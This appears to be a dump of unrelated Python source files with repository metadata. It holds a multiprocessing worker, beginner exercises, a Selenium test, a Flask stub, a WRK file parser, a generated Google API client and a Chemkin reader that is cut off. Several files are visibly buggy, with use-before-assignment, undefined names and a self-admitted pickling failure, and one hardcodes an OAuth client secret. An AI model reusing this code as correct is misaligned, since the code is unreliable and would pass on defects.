51dddfcba457e5ebf76f6a9bbe69d7efa2208cb4
|
6214f2a89b5abb6dce3f3187692bea88874a4649
|
refs/heads/master
| 2021-04-03T04:12:37.142914 | 2018-03-09T15:40:35 | 2018-03-09T15:40:35 | 124,594,147 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,749 |
py
|
import multiprocessing
import sys
import re
class ProcessWorker(multiprocessing.Process):
"""
This class runs as a separate process to execute worker's commands in parallel
Once launched, it remains running, monitoring the task queue, until "None" is sent
"""
def __init__(self, task_q, result_q):
multiprocessing.Process.__init__(self)
self.task_q = task_q
self.result_q = result_q
return
def run(self):
"""
Overloaded function provided by multiprocessing.Process. Called upon start() signal
"""
proc_name = self.name
print( '%s: Launched' % (proc_name))
while True:
next_task_list = self.task_q.get()
if next_task is None:
# Poison pill means shutdown
print('%s: Exiting' % (proc_name))
self.task_q.task_done()
break
next_task = next_task_list[0]
print( '%s: %s' % (proc_name, next_task))
args = next_task_list[1]
kwargs = next_task_list[2]
answer = next_task(*args, **kwargs)
self.task_q.task_done()
self.result_q.put(answer)
return
# End of ProcessWorker class
class Worker(object):
"""
Launches a child process to run commands from derived classes in separate processes,
which sit and listen for something to do
This base class is called by each derived worker
"""
def __init__(self, config, index=None):
self.config = config
self.index = index
# Launce the ProcessWorker for anything that has an index value
if self.index is not None:
self.task_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.Queue()
self.process_worker = ProcessWorker(self.task_q, self.result_q)
self.process_worker.start()
print( "Got here")
# Process should be running and listening for functions to execute
return
def enqueue_process(target): # No self, since it is a decorator
"""
Used to place an command target from this class object into the task_q
NOTE: Any function decorated with this must use fetch_results() to get the
target task's result value
"""
def wrapper(self, *args, **kwargs):
self.task_q.put([target, args, kwargs]) # FAIL: target is a class instance method and can't be pickled!
return wrapper
def fetch_results(self):
"""
After all processes have been spawned by multiple modules, this command
is called on each one to retreive the results of the call.
This blocks until the execution of the item in the queue is complete
"""
self.task_q.join() # Wait for it to to finish
return self.result_q.get() # Return the result
@enqueue_process
def run_long_command(self, command):
print( "I am running number % as process "%number, self.name )
# In here, I will launch a subprocess to run a long-running system command
# p = Popen(command), etc
# p.wait(), etc
return
def close(self):
self.task_q.put(None)
self.task_q.join()
if __name__ == '__main__':
config = ["some value", "something else"]
index = 7
workers = []
for i in range(5):
worker = Worker(config, index)
worker.run_long_command("ls /")
workers.append(worker)
for worker in workers:
worker.fetch_results()
# Do more work... (this would actually be done in a distributor in another class)
for worker in workers:
worker.close()
|
[
"[email protected]"
] | |
66232ac70c2956a0cdd7e2de1e6855bd119e53dc
|
1d7147717ed51c34d09e2f68dbb9c746245b147d
|
/L2C1_project1.py
|
41a63402d6406d1ff1fa10de3b486ec6827f66ba
|
[] |
no_license
|
aaryanredkar/prog4everybody
|
987e60ebabcf223629ce5a80281c984d1a7a7ec2
|
67501b9e9856c771aea5b64c034728644b25dabe
|
refs/heads/master
| 2020-05-29T18:12:33.644086 | 2017-02-13T02:46:44 | 2017-02-13T02:46:44 | 46,829,424 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 90 |
py
|
x = int(input("Please enter an integer:"))
print()
for i in range(0,x + 1):
print (i)
|
[
"[email protected]"
] | |
ddd780af0f467b3e365ab91cc4e73b3afe4f785c
|
b58c3f5b69772d5383727b8257536ab41a29cd02
|
/testsuites/test03_shopmanage.py
|
c3344499a4f13305952624af0de7a9e677e12957
|
[] |
no_license
|
pwxing/LinkeDs
|
b25fe937100b352f00f152306f7b15691c69f41e
|
2f996a70cd611eef27a826ae7ded38104e292374
|
refs/heads/master
| 2021-05-07T18:36:27.877468 | 2017-11-02T12:20:34 | 2017-11-02T12:20:34 | 108,817,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,936 |
py
|
# coding=utf-8
import time
import unittest
from framework.browser_engine import BrowserEngine
from framework.base_page import BasePage
from pageobjects.linke_loginpage import LoginPage
from pageobjects.linke_homepage import LinkeHomePage
from pageobjects.ds_shopmanage import ShopManage
import pageobjects
class ShopManageTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
browse = BrowserEngine(cls)
cls.driver = browse.open_browser(cls)
@classmethod
def tearDownClass(cls):
# cls.driver.quit()
pass
def test_ds_menu001(self):
# self.login()
loginpage = LoginPage(self.driver)
loginpage.login()
time.sleep(1)
loginpage.get_windows_img() # 调用基类截图方法
# 点击电商按钮
linkehomepage = LinkeHomePage(self.driver)
time.sleep(1)
linkehomepage.send_ds_link_btn()
time.sleep(1)
shopmanage = ShopManage(self.driver)
print shopmanage.get_y_order_text()
print shopmanage.get_y_amount_text()
print shopmanage.get_no_send_text()
print shopmanage.get_prepare_goods_text()
print shopmanage.get_refund_text()
shopmanage.click_y_order()
time.sleep(1)
self.driver.back()
time.sleep(1)
shopmanage.click_ds_info()
time.sleep(1)
shopmanage.click_ds_info()
# 查询时间
shopmanage.type_select_query_time(u"近一周")
time.sleep(2)
shopmanage.type_select_query_time(u"近一月")
time.sleep(2)
shopmanage.type_select_query_time(u"昨天")
time.sleep(2)
shopmanage.type_select_query_time(u"自定义时间")
time.sleep(2)
shopmanage.type_cus_time("2017-07-20", "2017-07-25")
time.sleep(1)
shopmanage.click_query_btn()
time.sleep(2)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7d4360c378c244e4834437c6bf0bbf020e1885ff
|
b85bca40004f9d1737fb4d342e8ea040eefb453b
|
/tests/lgdo/test_scalar.py
|
3ff4c51833af64977b65fb3570d064c5a0fc7ac5
|
[
"Apache-2.0"
] |
permissive
|
wisecg/pygama
|
95f744af56a8df81020f195695128a5ce0a6aca6
|
9a422d73c20e729f8d014a120a7e8714685ce4db
|
refs/heads/main
| 2022-12-24T02:02:05.554163 | 2022-12-05T16:32:30 | 2022-12-05T16:32:30 | 257,975,470 | 0 | 1 |
Apache-2.0
| 2020-04-22T17:41:46 | 2020-04-22T17:41:45 | null |
UTF-8
|
Python
| false | false | 468 |
py
|
import pygama.lgdo as lgdo
def test_datatype_name():
scalar = lgdo.Scalar(value=42)
assert scalar.datatype_name() == "real"
def test_form_datatype():
scalar = lgdo.Scalar(value=42)
assert scalar.form_datatype() == "real"
# TODO: check for warning if mismatched datatype
def test_init():
attrs = {"attr1": 1}
scalar = lgdo.Scalar(value=42, attrs=attrs)
assert scalar.value == 42
assert scalar.attrs == attrs | {"datatype": "real"}
|
[
"[email protected]"
] | |
e95bf537e32a24dacce0ab8d8e392fff4ac0c249
|
cda2cbe020f70db1bfc645973a9c1e3c62e18e92
|
/ex24.py
|
5248ea0c9a8da0dd9d98ea9ece2a571e9aa3f114
|
[] |
no_license
|
SpaceOtterInSpace/Learn-Python
|
a22c27a8fc4d955a309b8248d7e34b8957eecf24
|
3f8cc6b6212449ef3f2148e66bce9d83f23191dc
|
refs/heads/master
| 2020-04-20T16:29:46.282166 | 2015-07-07T20:04:36 | 2015-07-07T20:04:36 | 35,775,230 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 916 |
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "----------"
print poem
print "----------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d beans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"[email protected]"
] | |
fee23db67ca1b01428550a6fd45ebdf1149b381a
|
19a86ab59d3ab02103a0b12c2cb4eebdcf028679
|
/app.py
|
40f11fd05d7032f13ce823d7e818a763ff66e0a8
|
[] |
no_license
|
npvandyke/surfs_up
|
e5acee499baa6a51b4bf19d9ee6d551de8ac1a70
|
e9f5a59db7aec07a9e756a105a54f539dee6f04b
|
refs/heads/main
| 2023-03-29T17:48:34.057067 | 2021-04-01T22:11:33 | 2021-04-01T22:11:33 | 350,831,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 217 |
py
|
# Import dependency
from flask import Flask
# Create a new Flask app instance
app = Flask(__name__)
# Define the starting point (root) of the first route
@app.route('/')
def hello_world():
return 'Hello world'
|
[
"[email protected]"
] | |
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2
|
e7b07f173a8bc0d36e046c15df7bbe3d18d49a33
|
/parse.py
|
9d1894ef9159fb1b51738dbba15b24d5bcb61bc0
|
[] |
no_license
|
jcarbaugh/makeitwrk
|
82b6e8079b118e8d668b2e6858096a54da33d5a8
|
83801b19c120b4cf728b8342c4933fefe54b54d8
|
refs/heads/master
| 2020-04-06T04:55:56.785930 | 2011-08-26T19:09:27 | 2011-08-26T19:09:27 | 2,275,931 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,029 |
py
|
#!/usr/bin/env python
from struct import pack, unpack
import sys
CHUNK_TYPES = {
1: 'TRACK_CHUNK',
2: 'STREAM_CHUNK',
4: 'METER_CHUNK',
5: 'TEMPO_CHUNK',
6: 'SYSEX_CHUNK',
7: 'MEMRGN_CHUNK',
10: 'TIMEBASE_CHUNK',
# variables
3: 'VARS_CHUNK',
26: 'VARS_CHUNK_VAR',
# device stuff
33: 'DEVICES',
# track stuff?
36: 'TRACK_NAME?',
54: 'TRACK_PORT',
45: 'TRACK_DATA?',
255: 'END_CHUNK',
}
def solomon(arr, parts):
for i in range(0, parts * 8, 8):
yield arr[i:i+8]
def chunk_reader(wrkfile):
if wrkfile.read(8) != b'CAKEWALK':
raise ValueError('invalid file format')
wrkfile.read(1) # byte I don't care about
mm_version = wrkfile.read(2)
major = ord(mm_version[1])
minor = ord(mm_version[0])
version = "%i.%i" % (major, minor)
yield ('VERSION_CHUNK', 2, None, version)
while 1:
ch_type_data = wrkfile.read(1)[0]
ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
if ch_type == 'END_CHUNK':
break
ch_len = unpack('i', wrkfile.read(4))[0]
ch_data_offset = wrkfile.tell()
#print(ch_data_offset)
ch_data = wrkfile.read(ch_len)
yield (ch_type, ch_len, ch_data)
yield ('END_CHUNK', None, None, None)
wrkfile.close()
if __name__ == '__main__':
for chunk in chunk_reader(sys.stdin):
print(chunk)
# if chunk[0] == 'TRACK_NAME?':
# (tnum, tname_len) = unpack('HB', chunk[2][:3])
# tname = chunk[2][3:3+tname_len].decode('utf-8')
# print("[%02i] %s" % (tnum, tname))
# elif chunk[0] == 'TRACK_DATA?':
# (tnum, schunks) = unpack('=HxH', chunk[2][:5])
# print(' ', '------------')
# for s in solomon(chunk[2][7:], schunks):
# print(' ', unpack('8B', s))
"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
submeasure . . . .
measure. . . .
? . . . .
? . . .
nt? . .
? .
-----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00
__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
"""
|
[
"[email protected]"
] | |
59fafc2d56a1ca1d9d3712f7dfda2784a96c910b
|
71c331e4b1e00fa3be03b7f711fcb05a793cf2af
|
/QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/recaptchaenterprise/v1/recaptchaenterprise_v1_client.py
|
79510bf7357cd70baba2a7b3f103d23cabd30234
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
iofh/QA-System
|
568228bb0c0adf9ec23b45cd144d61049e720002
|
af4a8f1b5f442ddf4905740ae49ed23d69afb0f6
|
refs/heads/master
| 2022-11-27T23:04:16.385021 | 2020-08-12T10:11:44 | 2020-08-12T10:11:44 | 286,980,492 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,467 |
py
|
"""Generated client library for recaptchaenterprise version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recaptchaenterprise.v1 import recaptchaenterprise_v1_messages as messages
class RecaptchaenterpriseV1(base_api.BaseApiClient):
"""Generated client library for service recaptchaenterprise version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recaptchaenterprise.googleapis.com/'
MTLS_BASE_URL = 'https://recaptchaenterprise.mtls.googleapis.com/'
_PACKAGE = 'recaptchaenterprise'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecaptchaenterpriseV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new recaptchaenterprise handle."""
url = url or self.BASE_URL
super(RecaptchaenterpriseV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_assessments = self.ProjectsAssessmentsService(self)
self.projects_keys = self.ProjectsKeysService(self)
self.projects = self.ProjectsService(self)
class ProjectsAssessmentsService(base_api.BaseApiService):
"""Service class for the projects_assessments resource."""
_NAME = 'projects_assessments'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsAssessmentsService, self).__init__(client)
self._upload_configs = {
}
def Annotate(self, request, global_params=None):
r"""Annotates a previously created Assessment to provide additional information.
on whether the event turned out to be authentic or fradulent.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsAnnotateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse) The response message.
"""
config = self.GetMethodConfig('Annotate')
return self._RunMethod(
config, request, global_params=global_params)
Annotate.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments/{assessmentsId}:annotate',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.annotate',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:annotate',
request_field='googleCloudRecaptchaenterpriseV1AnnotateAssessmentRequest',
request_type_name='RecaptchaenterpriseProjectsAssessmentsAnnotateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse',
supports_download=False,
)
def Create(self, request, global_params=None):
r"""Creates an Assessment of the likelihood an event is legitimate.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Assessment) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/assessments',
request_field='googleCloudRecaptchaenterpriseV1Assessment',
request_type_name='RecaptchaenterpriseProjectsAssessmentsCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Assessment',
supports_download=False,
)
class ProjectsKeysService(base_api.BaseApiService):
"""Service class for the projects_keys resource."""
_NAME = 'projects_keys'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsKeysService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a new reCAPTCHA Enterprise key.
Args:
request: (RecaptchaenterpriseProjectsKeysCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='POST',
method_id='recaptchaenterprise.projects.keys.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/keys',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleProtobufEmpty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='DELETE',
method_id='recaptchaenterprise.projects.keys.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysDeleteRequest',
response_type_name='GoogleProtobufEmpty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Returns the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysGetRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Returns the list of all keys that belong to a project.
Args:
request: (RecaptchaenterpriseProjectsKeysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1ListKeysResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v1/{+parent}/keys',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysListRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1ListKeysResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='PATCH',
method_id='recaptchaenterprise.projects.keys.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysPatchRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"[email protected]"
] | |
602bf5ff185fae424574e01f0d60bafdc9fad426
|
9d032e9864ebda8351e98ee7950c34ce5168b3b6
|
/301.py
|
10f8978082ea2c4ee7bbac60f631a00e920d68cf
|
[] |
no_license
|
snpushpi/P_solving
|
e0daa4809c2a3612ba14d7bff49befa7e0fe252b
|
9980f32878a50c6838613d71a8ee02f492c2ce2c
|
refs/heads/master
| 2022-11-30T15:09:47.890519 | 2020-08-16T02:32:49 | 2020-08-16T02:32:49 | 275,273,765 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,269 |
py
|
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).
Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]
Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]
Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
count = 0
for char in string:
if char=='(':
count+=1
elif char==')':
count-=1
if count<0:
return False
return (count==0)
def main(input_string):
l = len(input_string)
queue = [input_string]
visited = set()
visited.add(input_string)
level = False
result = []
while queue:
new_str = queue.pop(0)
if validstring(new_str):
result.append(new_str)
level= True
if level:
continue
for i in range(len(new_str)):
if not (new_str[i]==')' or new_str[i]=='('):
continue
part_string = new_str[:i]+new_str[i+1:]
if part_string not in visited:
visited.add(part_string)
queue.append(part_string)
return result
print(main("()())()"))
|
[
"[email protected]"
] | |
6bf0a913bcc4d96db71c5ad8e16ab1214ef394f8
|
51bd1f17a4e9942128b2c0824d397ebb74067e4c
|
/py_box3/mkm/chemkin/__init__.py
|
9f2981ce6f8ee408e5b347aef0ba9261ee2bc6fb
|
[] |
no_license
|
jonlym/py_box
|
3290db8fab2ca97fbd348d02ae4a3319207ccfb0
|
ae5187a433ef654d6b96ee98ca7ab742d83d11d9
|
refs/heads/master
| 2021-01-19T05:42:10.056427 | 2018-12-20T18:44:01 | 2018-12-20T18:44:01 | 87,442,931 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,054 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 23 14:57:39 2016
@author: Jonathan Lym
"""
from py_box3.constants import T0, convert_unit
from ase.io import read
from py_box3.thermo.thermdat import Thermdat
from py_box3.thermo.thermdats import Thermdats
import numpy as np
class Chemkin(object):
def __init__(self,
species = None,
sites = None,
reactions = None,
BEPs = None,
LSRs = None,
DOEs = None,
GAs = None,
SAs = None,
StatpQ = None,
reactor_type = 1,
n_runs = 1,
multi_input = True,
standard_T_and_P = True,
Ts = [],
Ps = [],
Qs = [],
SA_Vs = [],
T_rise = 0.,
isothermal = True,
linear_T_ramp = False,
external_T = 923.,
heat_transfer_area_to_volume = 3.571,
heat_transfer_coefficient = 0.,
TPD_ramp = 0.,
MARI = '',
reactant = '',
volume = 100.,
nnodes = 1,
ttout = 1.e-2,
rtime = 1.e-4,
ntdec = 10.,
save_transient = False,
set_equation_tolerance = True,
absolute_tolerance = 1.e-10,
relative_tolerance = 1.e-8,
non_negative_composition = True,
restart_max = 0,
use_iterative_solver = False,
upper_bandwidth = 0,
lower_bandwidth = 0,
use_coverage_effects = False,
use_binding_energy_corrections = False,
use_BEPs = False,
use_LSRs = False,
use_different_activation_energy = False,
use_omega = False,
omega = 0.5,
T_ref = 1.,
reaction_path_analysis_mode = 1,
verbose_reaction_path_analysis = False,
reaction_path_analysis_T = 900.,
sensitivity_analysis = False,
design_of_experiments = False):
#Objects
self.species = species
self.sites = sites
self.reactions = reactions
self.BEPs = BEPs
self.LSRs = LSRs
self.DOEs = DOEs
self.GAs = GAs
self.SAs = SAs
self.StatpQ = StatpQ
#Reactor parameters
self.reactor_type = reactor_type
self.n_runs = n_runs
self.multi_input = multi_input
self.standard_T_and_P = standard_T_and_P
self.Ts = Ts
self.Ps = Ps
self.Qs = Qs
self.SA_Vs = SA_Vs
self.T_rise = T_rise
self.external_T = external_T
self.heat_transfer_area_to_volume = heat_transfer_area_to_volume
self.heat_transfer_coefficient = heat_transfer_coefficient
self.TPD_ramp = TPD_ramp
self.MARI = MARI
self.reactant = reactant
self.volume = volume
#Reactor Options
self.isothermal = isothermal
self.linear_T_ramp = linear_T_ramp
#Solver options
self.nnodes = nnodes
self.ttout = ttout
self.rtime = rtime
self.ntdec = ntdec
self.save_transient = save_transient
self.set_equation_tolerance = set_equation_tolerance
self.absolute_tolerance = absolute_tolerance
self.relative_tolerance = relative_tolerance
self.non_negative_composition = non_negative_composition
self.restart_max = restart_max
self.use_iterative_solver = use_iterative_solver
self.upper_bandwidth = upper_bandwidth
self.lower_bandwidth = lower_bandwidth
#Reaction options
self.use_coverage_effects = use_coverage_effects
self.use_binding_energy_corrections = use_binding_energy_corrections
self.use_BEPs = use_BEPs
self.use_LSRs = use_LSRs
self.use_different_activation_energy = use_different_activation_energy
self.use_omega = use_omega
self.omega = omega
self.T_ref = T_ref
#Output options
self.reaction_path_analysis_mode = reaction_path_analysis_mode
self.verbose_reaction_path_analysis = verbose_reaction_path_analysis
self.reaction_path_analysis_T = reaction_path_analysis_T
self.sensitivity_analysis = sensitivity_analysis
self.design_of_experiments = design_of_experiments
@classmethod
def from_INP(self, path = '.'):
sites = Sites.from_surf_inp(path = os.path.join(path, 'surf.inp'))
species = Species.from_thermdat(path = os.path.join(path, 'thermdat'))
species.get_sites(path = os.path.join(path, 'surf.inp'))
gas_reactions = Reactions.from_gas_inp(path = os.path.join(path, 'gas.inp'))
surf_reactions = Reactions.from_surf_inp(path = os.path.join(path, 'surf.inp'))
reactions = copy(gas_reactions).extend(copy(surf_reactions))
input_dict = self.read_tube_inp(path = os.path.join(path, 'tube.inp'), return_dict = True)
#Optional Objects
if tube_dict['use_BEPs']:
input_dict['BEPs'] = BEPs.from_BEP_inp(path = os.path.join(path, 'BEP.inp'))
if tube_dict['use_LSRs']:
input_dict['LSRs'] = LSRs.from_Scale_inp(path = os.path.join(path, 'Scale.inp'))
if tube_dict['design_of_experiments']:
input_dict['DOEs'] = DOEs.from_DOE_inp(path = os.path.join(path, 'DOE.inp'))
if tube_dict['use_GAs']:
input_dict['GAs'] = GAs.from_GA_inp(path = os.path.join(path, 'GA.inp'))
if tube_dict['sensitivity_analysis']:
input_dict['SAs'] = SAs.from_SA_inp(path = os.path.join(path, 'SA.inp'))
if tube_dict['use_binding_energy_corrections']:
input_dict['StatpQ'] = StatpQ.from_StatpQ_inp(path = os.path.join(path, 'StatpQ.inp'))
if tube_dict['multi_input']:
(Ts, Ps, Qs, SA_Vs) = self.read_T_flow_inp(path = os.path.join(path, 'T_flow.inp'))
if tube_dict['use_different_activation_energy']:
reactions.read_EAs_inp(path = os.path.join(path, 'EAs.inp'))
reactions.read_EAg_inp(path = os.path.join(path, 'EAg.inp'))
return cls(species = species, sites = sites, reactions = reactions, **input_dict)
def read_tube_inp(self, path = 'tube.inp', return_dict = True):
tube_dict = dict()
with open(path, 'r') as f_ptr:
i = 0
for line in f_ptr:
#Skip lines
if '!' == line[0] or 'EOF' in line:
continue
data = [x for x in line.replace('\n', '').split(' ') if x != '']
if i == 0:
tube_dict['reactor_type'] = int(data[0])
tube_dict['n_runs'] = int(data[1])
tube_dict['multi_input'] = char_to_boolean(data[2])
elif i == 1:
tube_dict['standard_T_and_P'] = char_to_boolean(data[0])
tube_dict['Ts'] = [float(data[1])]
tube_dict['Ps'] = [float(data[2])]
tube_dict['Qs'] = [float(data[3])]
tube_dict['SA_Vs'] = [float(data[4])]
tube_dict['T_rise'] = float(data[5])
elif i == 2:
tube_dict['isothermal'] = char_to_boolean(data[0])
tube_dict['linear_T_ramp'] = int(data[1])
elif i == 3:
tube_dict['external_T'] = float(data[0])
tube_dict['heat_transfer_area_to_volume'] = float(data[1])
tube_dict['heat_transfer_coefficient'] = float(data[2])
tube_dict['TPD_ramp'] = float(data[3])
elif i == 4:
tube_dict['MARI'] = data[0]
tube_dict['reactant'] = data[1]
elif i == 5:
tube_dict['volume'] = float(data[0])
tube_dict['nnodes'] = int(data[1])
tube_dict['ttout'] = float(data[2])
tube_dict['rtime'] = float(data[3])
tube_dict['ntdec'] = int(data[4])
tube_dict['save_transient'] = char_to_boolean(data[5])
elif i == 6:
tube_dict['set_equation_tolerance'] = char_to_boolean(data[0])
tube_dict['absolute_tolerance'] = float(data[1])
tube_dict['relative_tolerance'] = float(data[2])
tube_dict['non_negative_composition'] = char_to_boolean(data[3])
